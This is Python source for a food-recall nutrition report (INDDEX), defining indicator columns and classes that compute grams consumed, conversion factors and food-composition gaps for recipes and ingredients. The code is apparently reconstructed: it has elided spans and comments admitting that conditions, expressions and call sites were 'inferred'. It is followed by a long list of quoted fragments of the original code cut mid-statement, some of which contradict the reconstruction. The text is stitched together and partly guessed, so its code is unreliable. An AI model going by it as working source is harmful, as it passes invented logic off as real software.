    I('opened_by_username', IN_UCR, IS_RECALL_META),
    I('owner_name', IN_UCR, IS_RECALL_META),
    I('visit_date', IN_UCR, IS_RECALL_META),
    I('opened_on', IN_UCR, IS_RECALL_META),
    I('recall_status', IN_UCR, IS_RECALL_META),
    I('gender', IN_UCR, IS_RECALL_META),
    I('age_years_calculated', IN_UCR, IS_RECALL_META),
    I('age_months_calculated', IN_UCR, IS_RECALL_META),
    I('age_range', IS_RECALL_META),
    I('pregnant', IN_UCR, IS_RECALL_META),
    I('breastfeeding', IN_UCR, IS_RECALL_META),
    I('urban_rural', IN_UCR, IS_RECALL_META),
    I('supplements', IN_UCR, IS_RECALL_META),
    I('food_code', IN_UCR),
    I('food_name', IN_UCR, IN_FOOD_FIXTURE),
    I('recipe_name', IN_UCR, CALCULATED_LATER),
    I('caseid'),
    I('food_type', IN_UCR, IN_FOOD_FIXTURE),
    I('food_status', IN_UCR, IS_RECALL_META),
    I('reference_food_code'),
    I('base_term_food_code', IN_UCR),
    I('include_in_analysis'),
    I('fao_who_gift_food_group_code'),
    I('fao_who_gift_food_group_description'),
    I('user_food_group'),
    I('eating_time', IN_UCR, IS_RECALL_META),
    I('time_block', IN_UCR, IS_RECALL_META),
    I('already_reported_food', IN_UCR),
    I('already_reported_food_case_id', IN_UCR),
    I('already_reported_recipe', IN_UCR),
    I('already_reported_recipe_case_id', IN_UCR),
    I('already_reported_recipe_name', IN_UCR),
    I('is_ingredient', IN_UCR),
    I('ingredient_type', CALCULATED_LATER),
    I('recipe_case_id', IN_UCR),
    I('ingr_recipe_code'),
    I('ingr_fraction'),
    I('ingr_recipe_total_grams_consumed', CALCULATED_LATER),
    I('short_name', IN_UCR),
    # [...]
    I('food_base_term', IN_UCR, IN_FOOD_FIXTURE),  # placement inferred; referenced in FoodRow.__init__
    I('tag_2', IN_UCR, IN_FOOD_FIXTURE),
    I('other_tag_2', IN_UCR),
    I('tag_3', IN_UCR, IN_FOOD_FIXTURE),
    I('other_tag_3', IN_UCR),
    I('tag_4', IN_UCR, IN_FOOD_FIXTURE),
    I('other_tag_4', IN_UCR),
    I('tag_5', IN_UCR, IN_FOOD_FIXTURE),
    I('other_tag_5', IN_UCR),
    I('tag_6', IN_UCR, IN_FOOD_FIXTURE),
    I('other_tag_6', IN_UCR),
    I('tag_7', IN_UCR, IN_FOOD_FIXTURE),
    I('other_tag_7', IN_UCR),
    I('tag_8', IN_UCR, IN_FOOD_FIXTURE),
    I('other_tag_8', IN_UCR),
    I('tag_9', IN_UCR, IN_FOOD_FIXTURE),
    I('other_tag_9', IN_UCR),
    I('tag_10', IN_UCR, IN_FOOD_FIXTURE),
    I('other_tag_10', IN_UCR),
    I('conv_method_code', IN_UCR),
    I('conv_method_desc', IN_UCR),
    I('conv_option_code', IN_UCR),
    I('conv_option_desc', IN_UCR),
    I('measurement_amount', IN_UCR),
    I('conv_units', IN_UCR),
    I('portions', IN_UCR),
    I('nsr_conv_method_code_post_cooking', IN_UCR),
    I('nsr_conv_method_desc_post_cooking', IN_UCR),
    I('nsr_conv_option_code_post_cooking', IN_UCR),
    I('nsr_conv_option_desc_post_cooking', IN_UCR),
    I('nsr_measurement_amount_post_cooking', IN_UCR),
    I('nsr_consumed_cooked_fraction', IN_UCR),
    I('recipe_num_ingredients', CALCULATED_LATER),
    I('conv_factor_food_code'),
    I('conv_factor_base_term_food_code'),
    I('conv_factor_used'),
    I('conv_factor'),
    I('fct_food_code_exists'),
    I('fct_base_term_food_code_exists'),
    I('fct_reference_food_code_exists'),
    I('fct_data_used'),
    I('fct_code'),
    I('total_grams', CALCULATED_LATER),
    I('conv_factor_gap_code'),
    # [...]
    I('fct_gap_desc', CALCULATED_LATER),
]
_INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS}

NSR_COLS_TO_COPY = [
    'nsr_conv_method_code_post_cooking',
    'nsr_conv_method_desc_post_cooking',
    'nsr_conv_option_code_post_cooking',
    'nsr_conv_option_desc_post_cooking',
    'nsr_measurement_amount_post_cooking',
    'nsr_consumed_cooked_fraction',
]


class FoodRow:

    def __init__(self, ucr_row, fixtures, ingredient=None):
        self.uuid = uuid.uuid4()
        self.ucr_row = ucr_row
        self.fixtures = fixtures

        self._is_std_recipe_ingredient = bool(ingredient)
        if self._is_std_recipe_ingredient:
            self.food_code = ingredient.ingr_code
            self._set_ingredient_fields(ingredient)
        else:
            self.caseid = ucr_row['doc_id']
            self.food_code = ucr_row['food_code']

        if not self.food_code and self.food_name in self.fixtures.foods_by_name:
            self.food_code = self.fixtures.foods_by_name[self.food_name].food_code
        if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name:
            self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code

        self._set_composition()
        self._set_conversion_factors()

        self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE)
        self.include_in_analysis = not self.is_recipe

        self.measurement_amount = _maybe_float(self.measurement_amount)
        self.portions = _maybe_float(self.portions)
        self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction)
        self.enrichment_complete = False

    def _set_ingredient_fields(self, ingredient):
        if self._is_std_recipe_ingredient:
            self.is_ingredient = 'yes'
            self.ingr_recipe_code = ingredient.recipe_code
            self.ingr_fraction = ingredient.ingr_fraction

    def _set_composition(self):
        # Get the food composition corresponding to this food
        fct = self.fixtures.food_compositions
        self.fct_food_code_exists = bool(self.food_code and self.food_code in fct)
        self.fct_base_term_food_code_exists = bool(self.base_term_food_code
                                                   and self.base_term_food_code in fct)
        self.fct_code = None
        if self.fct_food_code_exists:
            self.fct_code = self.food_code
            self.fct_data_used = 'food_code'
        elif self.fct_base_term_food_code_exists:
            self.fct_code = self.base_term_food_code
            self.fct_data_used = 'base_term_food_code'
        if self.fct_code:
            self.composition = fct[self.fct_code]
            self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code
            self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description
            self.user_food_group = self.composition.user_defined_food_group
            self.reference_food_code = self.composition.reference_food_code_for_food_composition
            if self.fct_data_used == 'food_code' and self.reference_food_code:  # condition tail inferred
                # [...]
                pass

    def set_fct_gap(self, ingredients=None):
        if ingredients:
            for row in ingredients:
                row.set_fct_gap()
        self.fct_gap_code = FctGaps.NOT_AVAILABLE
        if self.food_type == FOOD_ITEM and self.fct_code:
            self.fct_gap_code = {
                'food_code': FctGaps.AVAILABLE,
                'base_term_food_code': FctGaps.BASE_TERM,
                'reference_food_code': FctGaps.REFERENCE,
            }[self.fct_data_used]
        if self.is_recipe and ingredients:
            if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients):
                self.fct_gap_code = FctGaps.AVAILABLE
            else:
                self.fct_gap_code = FctGaps.INGREDIENT_GAPS
        self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code]

    def _set_conversion_factors(self):
        self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE
        if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient
                or self.food_type == NON_STANDARD_RECIPE):
            self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE
        elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code:
            self.conv_factor_food_code = self.fixtures.conversion_factors.get(
                (self.food_code, self.conv_method_code, self.conv_option_code))
            self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get(
                (self.base_term_food_code, self.conv_method_code, self.conv_option_code))
            if self.conv_factor_food_code:
                self.conv_factor_used = 'food_code'
                self.conv_factor = self.conv_factor_food_code
                self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE
            elif self.conv_factor_base_term_food_code:
                self.conv_factor_used = 'base_term_food_code'
                self.conv_factor = self.conv_factor_base_term_food_code
                self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM
        self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code]

    @property
    def age_range(self):
        if not self.age_months_calculated:
            return None
        for age_range in AGE_RANGES:
            if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound:
                return age_range.name

    def get_nutrient_per_100g(self, nutrient_name):
        if self.fct_code:
            return self.composition.nutrients.get(nutrient_name)

    # [...]

    def __getattr__(self, name):
        if name in _INDICATORS_BY_SLUG:
            indicator = _INDICATORS_BY_SLUG[name]
            if indicator.is_calculated_later:
                if not self.enrichment_complete:
                    raise AttributeError(f"{name} hasn't yet been set. It will be "
                                         "calculated outside the scope of FoodRow.")
                return None
            if self._is_std_recipe_ingredient:
                # If it's an indicator that hasn't been explicitly set, check if it can
                # be pulled from the food fixture or from the parent food case's UCR
                if indicator.in_food_fixture:
                    return getattr(self.fixtures.foods[self.food_code], indicator.slug)
                if indicator.is_recall_meta:
                    return self.ucr_row[indicator.slug]
                return None
            else:
                # If it's an indicator in the UCR that hasn't been explicitly set, return that val
                return self.ucr_row[indicator.slug] if indicator.in_ucr else None
        raise AttributeError(f"FoodRow has no definition for {name}")


class FoodData:
    """[...] reports. See file docstring for more."""
    IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type']
    FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS

    def __init__(self, domain, *, datespan, filter_selections):
        for slug in filter_selections:
            if slug not in self.FILTERABLE_COLUMNS:
                raise AssertionError(f"{slug} is not a valid filter slug")
        self.fixtures = FixtureAccessor(domain)
        self._in_memory_filter_selections = {
            slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS
            if slug in filter_selections
        }
        self._ucr = FoodCaseData({
            'domain': domain,
            'startdate': str(datespan.startdate),
            'enddate': str(datespan.enddate),  # inferred to mirror 'startdate'
            **{k: v for k, v in filter_selections.items()
               if k in FoodCaseData.FILTERABLE_COLUMNS}
        })

    @classmethod
    def from_request(cls, domain, request):
        return cls(
            domain,
            datespan=request.datespan,
            filter_selections={'owner_id': cls._get_owner_ids(domain, request),
                               **{k: [v for v in request.GET.getlist(k) if v]
                                  for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}}
        )

    @staticmethod
    def _get_owner_ids(domain, request):
        slugs = request.GET.getlist(EMWF.slug)
        if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs):
            return []  # don't filter by owner
        if EMWF.show_deactivated_data(slugs):
            return (user_es.UserES()
                    .show_only_inactive()
                    .domain(domain)
                    .get_ids())
        return get_case_owners(request, domain, slugs)

    def _matches_in_memory_filters(self, row):
        # If a gap type is specified, show only rows with gaps of that type
        gap_type = self._in_memory_filter_selections.get('gap_type')
        if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE:
            return False
        if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE:
            return False

        food_types = self._in_memory_filter_selections.get('food_type')
        if food_types and row.food_type not in food_types:
            return False

        food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code')
        if food_groups and row.fao_who_gift_food_group_code not in food_groups:
            return False

        return True

    def _get_grouped_rows(self):
        """Return raw case rows grouped by recipe"""
        rows = defaultdict(lambda: {
            'recipe': None,
            'references': [],
            'ingredients': [],
        })
        for row in self._ucr.get_data():
            if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE):
                if row['already_reported_recipe_case_id']:
                    rows[row['already_reported_recipe_case_id']]['references'].append(row)
                else:
                    rows[row['doc_id']]['recipe'] = row
            elif row['recipe_case_id']:
                rows[row['recipe_case_id']]['ingredients'].append(row)
            else:
                # this isn't [...]
                rows[row['doc_id']]['ingredients'].append(row)  # grouping for standalone foods inferred
        return rows.values()  # return shape inferred from _get_all_rows

    def _get_all_rows(self):
        for group in self._get_grouped_rows():
            master_recipe = group['recipe']
            references = group['references']
            ingredients = group['ingredients']
            if not master_recipe:
                yield from self._non_recipe_rows(references + ingredients)
            else:
                yield from self._recipe_rows(master_recipe, ingredients)
                for recipe in references:
                    recipe = _insert_nsr_cols(recipe, master_recipe)
                    yield from self._recipe_rows(recipe, ingredients)

    @property
    @memoized
    def rows(self):
        rows = []
        for row in self._get_all_rows():
            if self._matches_in_memory_filters(row):
                rows.append(row)
        return rows

    def _non_recipe_rows(self, rows):
        """These rows aren't part of a recipe, [...] found"""
        for raw_row in rows:
            row = FoodRow(raw_row, self.fixtures)
            row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions)
            row.set_fct_gap()
            row.enrichment_complete = True
            yield row

    def _recipe_rows(self, raw_recipe, raw_ingredients):
        recipe = FoodRow(raw_recipe, self.fixtures)
        if recipe.food_type == STANDARD_RECIPE:
            # std recipe ingredients come from the DB, NOT ingredient cases
            ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data)
                           for ingredient_data in self.fixtures.recipes[recipe.food_code]]
        else:  # NON_STANDARD_RECIPE
            ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients]
        total_grams = _calculate_total_grams(recipe, ingredients)
        recipe.set_fct_gap(ingredients)  # call site inferred from set_fct_gap's signature
        for row in [recipe] + ingredients:
            row.total_grams = total_grams[row.uuid]
            row.recipe_num_ingredients = len(ingredients)
            row.recipe_case_id = recipe.caseid
            if row.is_ingredient == 'yes':
                row.recipe_name = recipe.recipe_name
                if recipe.food_type == STANDARD_RECIPE:
                    row.ingredient_type = 'std_recipe_ingredient'
                    row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid]
                else:
                    row.ingredient_type = 'non_std_recipe_ingredient'
                    for col in NSR_COLS_TO_COPY:
                        # Copy these values from the recipe case
                        setattr(row, col, getattr(recipe, col))
            row.enrichment_complete = True
            yield row


def _insert_nsr_cols(raw_recipe, master_recipe):
    # nsr references [...] them from the master recipe
    nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY}
    amount = _maybe_float(raw_recipe['measurement_amount'])
    portions = _maybe_float(raw_recipe['portions'])
    amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking'])
    if all(val is not None for val in [amount, portions, amount_post_cooking]):
        nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking
    else:
        nsr_cols['nsr_consumed_cooked_fraction'] = None
    return {**raw_recipe, **nsr_cols}


def _calculate_total_grams(recipe, ingredients):
    if recipe.food_type == STANDARD_RECIPE:
        res = {}
        recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor,
                                 recipe.portions)  # expression inferred; not in the fragments
        res[recipe.uuid] = recipe_total
        for row in ingredients:
            res[row.uuid] = _multiply(recipe_total, row.ingr_fraction)
        return res
    else:  # NON_STANDARD_RECIPE
        res = {}
        for row in ingredients:
            res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor,
                                      row.portions, recipe.nsr_consumed_cooked_fraction)
        try:
            res[recipe.uuid] = sum(res.values()) if res else None
        except TypeError:
            res[recipe.uuid] = None
        return res


def _multiply(*args):
    try:
        return reduce(operator.mul, args)
    except TypeError:
        return None


def _maybe_float(val):
    return float(val) if val not in (None, '') else None
"= _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe,",
"that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE:",
"= FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come from",
"outside the scope of FoodRow.\") return None if self._is_std_recipe_ingredient: # If it's an",
"(self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used =",
"_maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for",
"indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It will be",
"FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row",
"datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v in request.GET.getlist(k) if v] for",
"tags # Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [",
"for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] =",
"a child of this foodrecall. This dataset has a row for every food,",
"'enddate': str(datespan.enddate), **{k: v for k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS}",
"reporting on what data is or isn't available. Some of these foods are",
"'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if",
"self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get",
"asked about their diet in a \"recall\" session. This results in a \"foodrecall\"",
"True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\" rows = defaultdict(lambda:",
"it can # be pulled from the food fixture or from the parent",
"(STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else:",
"in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row)",
"and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type",
"definition for {name}\") class FoodData: \"\"\"Generates the primary dataset for INDDEX reports. See",
"and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM,",
"self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type",
"row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE:",
"Beneficiaries are asked about their diet in a \"recall\" session. This results in",
"master dataset for the INDDEX reports Overview -------- Beneficiaries are asked about their",
"ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient)",
"= self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not",
"entered as additional food cases and linked to the recipe by `recipe_case_id`. Beneficiaries",
"TypeError: res[recipe.uuid] = None return res def _multiply(*args): try: return reduce(operator.mul, args) except",
"food, with metadata about the recall session, calculated nutritional information, and auditing columns",
"Standard recipes have their ingredients enumerated in the \"recipes\" lookup table. This dataset",
"not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid filter slug\") self.fixtures =",
"in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in",
"rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe'] references",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount',",
"IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant',",
"row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res = {} for row in ingredients:",
"= recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients =",
"= fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid",
"return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator =",
"STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for",
"else None except TypeError: res[recipe.uuid] = None return res def _multiply(*args): try: return",
"previously reported ingredients into the report for them. Components ---------- FoodData :: This",
"str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v in filter_selections.items() if k in",
"self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get the food composition corresponding to food_code,",
"case of their own. Nonstandard recipes are defined by the user and beneficiary",
"= IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for slug in",
"import operator import uuid from collections import defaultdict from functools import reduce from",
"are missing some values, insert them from the master recipe nsr_cols = {col:",
"indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If",
"str(datespan.enddate), **{k: v for k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} })",
"# this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for",
"I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'),",
"# If it's an indicator that hasn't been explicitly set, check if it",
"case rows grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None, 'references': [],",
"if self._is_std_recipe_ingredient: # If it's an indicator that hasn't been explicitly set, check",
"responsible for row-wise calculations and indicator definitions. \"\"\" import operator import uuid from",
"self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code =",
"self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists:",
"IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def __init__(self,",
"for raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions)",
"I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR,",
"This results in a \"foodrecall\" case. Every food they mention results in the",
"own. Nonstandard recipes are defined by the user and beneficiary during a recall",
"filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr = FoodCaseData({",
"explicitly set, check if it can # be pulled from the food fixture",
"ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code,",
"indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If it's an indicator in the",
"@classmethod def from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k:",
"yet been set. It will be \" \"calculated outside the scope of FoodRow.\")",
"recipes are defined by the user and beneficiary during a recall session. The",
"False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction",
"EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import (",
"if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code",
"found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META),",
"rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part",
"_multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res = {} for row in",
"in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients]",
"self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used =",
"# don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return",
"I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY =",
"self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code')",
"I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8',",
"ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM",
"col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if",
"cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE",
"k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs",
"enumerated in the \"recipes\" lookup table. This dataset has additional rows inserted for",
"= _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self,",
"yield from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in",
"I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7',",
"self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif",
"if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group =",
"return None if self._is_std_recipe_ingredient: # If it's an indicator that hasn't been explicitly",
"= FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type ==",
"AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name):",
"IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2',",
"IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name',",
"return reduce(operator.mul, args) except TypeError: return None def _maybe_float(val): return float(val) if val",
"in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later",
"IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META),",
"linked to the recipe by `recipe_case_id`. Beneficiaries may report eating a nonstandard recipe",
"I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc',",
